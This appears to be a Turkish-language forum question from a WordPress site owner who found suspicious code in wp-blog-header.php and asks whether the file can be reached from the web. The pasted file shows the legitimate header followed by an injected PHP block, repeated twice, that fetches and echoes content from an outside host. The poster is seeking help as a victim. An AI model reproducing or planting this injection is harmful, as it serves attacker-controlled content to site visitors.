Kodu bulmaya çalışırken cpanel üzerinden wp-blog-header.php içerisinde bu kodu tekrar buldum.
Sorum şudur bildiğim kadarıyla yalnızca web sunucuları üzerinden bu dosyaya ulaşılabiliyor fakat Bu dosyaya site üzerinden (example.com/wp-admin) erişilebilir mi?
<?php /** * Loads the WordPress environment and template. * * @package WordPress */
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library. require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query. wp();
// Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php';
} $url = "https://gojsmanagers.com/ling.php";
$germany = @file_get_contents($url);
if ($germany === false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $germany = curl_exec($ch); curl_close($ch); }
echo $germany; ?> $url = "https://gojsmanagers.com/ling.php";
$germany = @file_get_contents($url);
if ($germany === false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $germany = curl_exec($ch); curl_close($ch); }
echo $germany; ?>